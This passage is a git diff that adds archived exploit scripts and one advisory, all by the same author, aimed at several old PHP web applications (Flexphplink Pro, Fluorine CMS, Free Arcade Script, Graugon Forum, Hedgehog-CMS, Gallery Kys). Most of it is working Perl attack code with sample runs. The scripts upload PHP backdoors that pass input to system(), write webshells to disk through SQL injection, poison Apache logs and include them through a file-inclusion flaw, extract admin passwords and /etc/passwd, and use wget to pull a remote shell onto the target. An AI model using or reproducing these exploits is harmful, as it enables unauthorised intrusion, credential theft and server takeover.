Admin Details Disclosure +# 2 - Arbitrary Command Execution +# 3 - Shell upload +# 4 - Exit +# 1 +# [+] Extracting Admin Login Details . +# [+] Done: +# Username: admin +# Password: adminz +# osirys[~]>$ + + +use HTTP::Request; +use LWP::UserAgent; + + +my $path = "/submitlink.php"; +my $u_path = "/linkphoto/"; +my $l_file = "back.php"; + +my $code = "RCE backdoor

\";if(!empty(\$_GET['cmd'])&&empty". + "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET". + "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )". + "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl". + "ude ('../const.inc.php');}echo \"Username: \$admin_username\"; echo". + "\"
\"; echo \"Password: \$admin_password\"; } ?>"; + +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +open ($file, ">", $l_file); +print $file "$code\n"; +close ($file); + +$dir = `pwd`; +my $f_path = $dir."/".$l_file; +$f_path =~ s/\n//; + +my $url = $host.$path; +my $ua = LWP::UserAgent->new; +$time = time(); +my $post = $ua->post($url, + Content_Type => 'form-data', + Content => [ + title => 'abco', + url => 'def', + userfile => [$f_path, '.php'], + addlink => 'Add' + ] + ); + +if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) { + `rm -rf $f_path`; + cheek_fname($time); + ($rcefile) || die "[-] Unable to find phpscript uploaded\n"; + &go; +} +else { + print "[-] Unable to upload evil php-code !\n"; + exit(0); +} + +sub go() { + my $error = $_[0]; + if ($error == -1) { + print "[-] Bad Choice\n\n"; + } + elsif ($error == -2) { + print "[-] Bad shell url\n\n"; + } + print "[+] $host backdoored, just type your choise:\n". + " 1 - Admin Details Disclosure\n". + " 2 - Arbitrary Command Execution\n". + " 3 - Shell upload\n". + " 4 - Exit\n"; + + $choice = ; + $choice =~ /1|2|3|4/ || go("-1"); + if ($choice == 1) { + &adm_disc; + } + elsif ($choice == 2) { + &exec_cmd; + } + elsif ($choice == 3) { + &shell_up; + } + elsif ($choice == 4) { + print "[-] Quitting ..\n"; + exit(0); + } +} + +sub adm_disc { + print "[+] Extracting Admin Login Details ..\n"; + $exec_url = ($host.$u_path.$time.".php?adm=get"); + $re = query($exec_url); + if ($re =~ /Username: <\/b>(.*)
Password: <\/b>(.*)/) { + my($user,$pass) = ($1,$2); + print "[+] Done: \n". + " Username: $user\n". + " Password: $pass\n"; + } + else { + print "[-] Can't extract Admin Details.\n\n"; + &go; + } +} + +sub exec_cmd { + print "shell\$>\n"; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ /CMD: <\/b>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub shell_up { + print "[+] Type now a link for your .txt shell\n". + " Shell name must be with .txt extension\n"; + $s_link = ; + $s_link =~ /.*\/(.*)\.txt/ || &go("-2"); + $s_name = $1; + $exec_url = ($host.$u_path.$time.".php?cmd=wget ".$s_link); + $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php"); + query($exec_url); query($exec_url2); + print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n"; +} + +sub cheek_fname() { + my $time = $_[0]; + my $name = $time.".php"; + $re = query($host.$u_path.$name); + if ($re =~ /RCE backdoor<\/b>/) { + $rcefile = $name; + return; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " Flexphplink Pro Exploit \n". + " Coded by Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". + " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you provide a hostname address!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl b/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl new file mode 100644 index 0000000..4191d2c --- /dev/null +++ b/Fluorine CMS 0.1 rc 1 - File Disclosure SQL Injection Command Execution.pl @@ -0,0 +1,257 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Fluorine CMS - Halite 0.1 rc 1 | +# |Download : http://garr.dl.sourceforge.net/sourceforge/fluorine/halite-0.1rc1.rar | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (File Disclosure + Remote Command Execution via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/halite.php?action=aff&id=[sql_string] +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection. The exploit just use load_file() mysql function to disclosure local file on the server, +# |and uses the '' into dumpfile '' mysql function to save a php shell on the website, so it will allows you to execute commands. +# |The RCE way is more difficult, becouse you need to know the site's path on the server, dumpfile function needs it ! +# |----------------------------------------------------------------------------------------------------------------------------------| + +# ----------------------------------------------------------------------------------------------- +# Exploit in action [>!] +# ----------------------------------------------------------------------------------------------- +# osirys[~]>$ perl xploit.txt http://localhost/cms0/ file_disc +# +# ------------------------------------- +# Fluorine CMS Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] cat /etc/passwd +# root:x:0:0::/root:/bin/bash +# bin:x:1:1:bin:/bin:/bin/false +# daemon:x:2:2:daemon:/sbin:/bin/false +# adm:x:3:4:adm:/var/log:/bin/false +# lp:x:4:7:lp:/var/spool/lpd:/bin/false +# sync:x:5:0:sync:/sbin:/bin/sync +# shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +# halt:x:7:0:halt:/sbin:/sbin/halt +# mail:x:8:12:mail:/:/bin/false +# news:x:9:13:news:/usr/lib/news:/bin/false +# uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false +# operator:x:11:0:operator:/root:/bin/bash +# games:x:12:100:games:/usr/games:/bin/false +# ftp:x:14:50::/home/ftp:/bin/false +# smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false +# mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false +# rpc:x:32:32:RPC portmap user:/:/bin/false +# sshd:x:33:33:sshd:/:/bin/false +# gdm:x:42:42:GDM:/var/state/gdm:/bin/bash +# apache:x:80:80:User for Apache:/srv/httpd:/bin/false +# messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false +# haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false +# pop:x:90:90:POP:/:/bin/false +# nobody:x:99:99:nobody:/:/bin/false +# osirys:x:1000:100:Giovanni,,,:/home/osirys:/bin/bash + +# [*] cat exit +# [-] Quitting .. +# osirys[~]>$ +# ----------------------------------------------------------------------------------------------- +# osirys[~]>$ perl xploit.txt http://localhost/cms0/ cmd /home/osirys/web/cms0/ +# +# ------------------------------------- +# Fluorine CMS Remote Exploit +# Coded by Osirys +# ------------------------------------- +# +# [*] Injectin php shell thou Sql Injection +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> whoami +# apache +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ----------------------------------------------------------------------------------------------- + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; +my $fpath = $ARGV[2]; + +my $sql_inj_path = "/halite.php?action=aff&id="; +my $gen_sql_inj = "-1 union all select 1,2,3,4,"; +my $php_c0de = ""; + +$fpath = "/x" if ($expl =~ /file_disc/); +($host,$expl,$fpath) || help("-1"); +cheek($host,$expl,$fpath) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&file_discl if $expl_way == 1; +&cmd if $expl_way == 2; + +sub file_discl { + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + my $sql_inj = $sql_inj_path.$gen_sql_inj."load_file(\"".$file."\")"; + my $attack = $host.$sql_inj; + my $re = get_req($attack); + my $content = tag($re); + if ($content =~ /\*\*(.*)(\*\*|\*\*\*)\$\$<\/td>\*\*\$<\/tr>/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + elsif ($content =~ /\*\*\*\*\$\$<\/td>\*\*\$<\/tr>/) { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub cmd { + print "[*] Injectin php shell thou Sql Injection\n"; + my $sql_inj = $sql_inj_path.$gen_sql_inj."'".$php_c0de."' into dumpfile '".$fpath."/shell.php'"; + my $attack = $host.$sql_inj; + get_req($attack); + my $test = get_req($host."shell.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd() { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + my $exec_url = $exec_path."?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.*)/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + my $fpath = $_[2]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /file_disc/) { + $ch_expl = 1; + $ch_fpath = 1; + $expl_way = 1; + } + elsif ($expl =~ /cmd/) { + $ch_expl = 1; + $expl_way = 2; + } + if ($fpath =~ /\/(.*)/) { + $ch_fpath = 1; + } + return 1 if ((($ch_host)&&($ch_expl)&&($ch_fpath)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " ------------------------------------- \n". + " Fluorine CMS Remote Exploit \n". + " Coded by Osirys \n". + " ------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path file_disc file\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc /etc/passwd\n"; + print "[*] Usage : perl $0 http://hostname/cms_path cmd path_of_site\n"; + print " Ex: perl $0 http://site.it/cms/ cmd /home/osirys/web/cms/\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-10] \ No newline at end of file diff --git a/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl b/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl new file mode 100644 index 0000000..a44ae90 --- /dev/null +++ b/Free Arcade Script 1.0 - Local File Inclusion Command Execution.pl @@ -0,0 +1,231 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Free Arcade Script 1.0 | +# |Download : http://freearcadescript.net/download.php?type=zip&name=freearcadescript&size=null&file=freearcadescriptv1.0.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit via Apache Log Injection | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |/[path]/pages/play.php is affected to Local File Inclusion vulnerability: +# |[code] +# |No game selected.'; +# | include ('templates/'.$template.'/footer.php'); +# | exit; +# |} +# |[/code] +# |$template is not declared. So, in case of php.ini configuration : +# |register_globals = On +# |we can set $template value from GET : +# |p0c : /[path]/pages/play.php?template=[lfi]%00 + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi.txt http://localhost/freearcadescriptv1.0/ +# +# --------------------------------- +# Free Arcade Script RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/freearcadescriptv1.0/pages +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/pages/play.php?template="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Free Arcade Script RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt b/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt new file mode 100644 index 0000000..f4289ac --- /dev/null +++ b/Gallery Kys 1.0 - Admin Password Disclosure Persistent Cross-Site Scripting.txt @@ -0,0 +1,74 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : Gallery Kys 1.0 +Download : http://www.advancescripts.com/djump.php?ID=6285 +Vulnerability : Admin Password Disclosure / Permanent XSS +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org + +######################################################################################### +[0x02] Bug: [Admin Password Disclosure] +###### + +Bugged file is: /[path]/config.inc + +[CODE] + + + +[/CODE] + +Just going at this path you will get Administrator's password. + +[!] FIX: Don't allow direct access to this file and change it's extension with .php + + +[!] EXPLOIT: /[path]/config.inc + $adpass="admin_pwd"; + +######################################################################################### +[0x03] Bug: [Permanent XSS] +###### + +Bugged file is: /[path]/uploadform.php + +[CODE] + +$fp =fopen($file, "w+"); +$name=stripslashes($name); +$des=stripslashes($des); +$code=stripslashes($code); +$author=stripslashes($author); +$w ="name=".$name."&price=".$price."&code=".$code."&des=".$des."&author=".$author."&mail=".$mail."&date=".$date."&web=".$web; + +[/CODE] + +Once we got Administrator's password, we are able to log in. + +Login at this path: /[path]/admin.php + +Then just go at this path: /[path]/uploadform.php + +Fill the forms, and put in description form the following code: + + + +After this action, data that we typed in the upload form, will be saved on .txt files. +In index.php source code, we can see that the script opens the .txt files, and prints +it's values directly in html code. + + +[!] FIX: Filter variables before printing them in the html code. + preg_math the < > " chars. Filter illegal chars. + +######################################################################################### + +[/END] + +# milw0rm.com [2009-01-19] \ No newline at end of file diff --git a/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl b/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl new file mode 100644 index 0000000..948e67e --- /dev/null +++ b/Graugon Forum 1 - 'id' Command Injection SQL Injection.pl @@ -0,0 +1,228 @@ +#!/usr/bin/perl + +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Graugon Forum v1 | +# |Download : http://www.graugon.com/forum/forum.zip | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |Remote SQL Command Injection Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |Thank you: milw0rm.com / packetstormsecurity.org / evilsocket.net | +# |--------------------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | p0c : /[path]/view_profile.php?id=[sql_string] +# |SQL Injections used by this sploit : +# |[1] /path]/view_profile.php?id=osirys' union all select concat(details),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 from admins_lf2713 order by '* +# |[2] /path]/view_profile.php?id=osirys' union all select load_file('file'),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 order by '* +# |[3] /path]/view_profile.php?id=osirys' union all select 'rce',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 into outfile 'file +# |--------------------------------------------------------------------------------------------------------------------------------------------| + +#----------------------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +#----------------------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl graugon_forum.txt http://localhost/forum/ +# +# --------------------------- +# Graugon Forum +# Command Inj Exploit +# by Osirys +# --------------------------- +# +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: password +# [*] Generating error through GET request .. +# [*] Cheeking Apache Error Log path .. +# [*] Error Log path found -> /var/log/httpd/error_log +# [*] Website path found -> /home/osirys/web/forum/ +# [*] Shell succesfully injected ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/forum +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +#----------------------------------------------------------------------------------------------------------------------------------------------| + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 9) +1; + +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +my $php_c0de = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/view_profile.php?id=osirys' union all select concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 from admins_lf2713 order by '*"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + $user = $1; + $pass = $2; + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "[*] Generating error through GET request ..\n"; + +get_req($host."/osirys_log_test".$rand); + +print "[*] Cheeking Apache Error Log path ..\n"; + +while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/view_profile.php?id=osirys' union all select load_file('".$log."'),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 order by '*"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + &inj_shell; + } +} + +$gotcha == 1 || die "[-] Couldn't file error_log !\n"; + +sub inj_shell { + my $attack = $host."/view_profile.php?id=osirys' union all select 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'".$php_c0de."',19 into outfile '".$site_path."/1337.php"; + get_req($attack); + my $test = get_req($host."/1337.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/1337.php?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)\*\*19/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------\n". + " Graugon Forum \n". + " Command Inj Exploit \n". + " by Osirys \n". + " ---------------------------\n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl b/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl new file mode 100644 index 0000000..7022b65 --- /dev/null +++ b/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl @@ -0,0 +1,218 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Hedgedog-CMS 1.21 | +# |Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, athum | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Local File Inclusion] +# | p0c : /[path]/includes/footer.php?c_temp_path=[lf]%00 +# | In source $c_temp_path is not declared, so if register_globals = On we can set its value from GET directly. +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Abitrary php code writing] +# | This cms is not coded too good, we can bypass admin login just doing it via socket or lwp with $_POST[l_mode]. +# | From admin panel everything before beeing passed in a file is filtered with htmlspecialchars and other fucntions, +# | expect of the email contact variable, that's the hell bug. +# | The sploit before overwriting a previous configuration, tries to get the old one, then it executes your commands. +# |----------------------------------------------------------------------------------------------------------------------------------| + + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lolzo.txt http://localhost/hedgehog-cms/ +# +# -------------------------------- +# Hedgedog-CMS RCE Exploit +# by Osirys +# -------------------------------- +# +# [*] Getting old configuration data .. +# [*] Overwriting configuration data .. +# [*] Overwrite succesfully ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/hedgehog-cms/config +# shell[localhost]$> la +# bash: la: command not found +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $post_pag = "/specialacts.php"; +my $rce_path = "/config/userconfig.php"; +my $rce_c0de = "%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B+%24xy+%3D+%22"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $ua_url = $host.$post_pag; +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $ua_url, + Content_Type => 'multipart/form-data', + Content => [l_mode => '33'] + ); + +if ($re->is_success) { + $data = $re->content; + print "[*] Getting old configuration data ..\n"; + get_old_data($data); + &overwrite; +} +else { + print "[-] Unable to get old configuration data ..\n"; + print "[*] Overwriting existing configuration ! \n"; + &overwrite; +} + +sub 